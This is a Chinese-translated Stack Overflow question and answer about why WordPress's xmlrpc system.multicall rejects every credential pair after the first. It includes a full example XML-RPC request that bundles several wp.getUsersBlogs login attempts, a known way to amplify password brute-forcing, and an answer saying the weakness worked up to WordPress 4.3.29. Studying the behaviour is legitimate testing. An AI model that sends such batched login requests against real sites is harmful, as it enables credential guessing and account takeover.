首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >wordpress中的system.multicall总是提供不正确的用户名或密码

wordpress中的system.multicall总是提供不正确的用户名或密码
EN

Stack Overflow用户
提问于 2022-09-28 19:35:35
回答 1查看 107关注 0票数 1

我在JMeter.For中使用xmlrpc的任何wordpress站点,如果我在第一个实例中添加了正确的用户名和密码,那么我就得到了正确的输出,但是如果我在第二个实例中添加了正确的凭据(或之后),那么我总是会得到“不正确的用户名或密码”。

代码语言:javascript
复制
POST /xmlrpc.php HTTP/1.1
Host: example.com

<?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
      <param><value><array><data>
      <value><struct>
      <member>
        <name>methodName</name>
        <value><string>wp.getUsersBlogs</string></value>
      </member>
      <member>
        <name>params</name><value><array><data>
        <value><array><data>
        <value><string>User1</string></value>
        <value><string>password1</string></value>
        </data></array></value>
        </data></array></value>
      </member>
      </struct></value>
      <value><struct>
      <member>
        <name>methodName</name>
        <value><string>wp.getUsersBlogs</string></value>
      </member>
      <member>
        <name>params</name>
        <value><array><data>
        <value><array><data>
          <value><string>User2</string></value>
          <value><string>Password2</string></value>
          </data></array></value>
        </data></array></value>
      </member>
      </struct></value>
      </data></array></value>
      </param>
    </params>
    </methodCall>
EN

回答 1

Stack Overflow用户

发布于 2022-10-05 10:07:18

我玩着同样的弱点,偶然发现了同样的行为。我在XML蛮力项目中发现了这个GitHub问题,讨论了同样的问题。自WordPress 4.7.x版本以来,该漏洞似乎已经得到修补。我还在找这个修补的时候.

更新

我真的很想找出易受攻击的版本,所以现在在安装了无数个WordPress版本之后,我能够发现漏洞可以工作到4.3.29版本。从4.4版开始,它不再适用于我了。

我希望这能让人平静下来,因为它使我的心平静下来。

票数 0
EN
页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://stackoverflow.com/questions/73886924

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档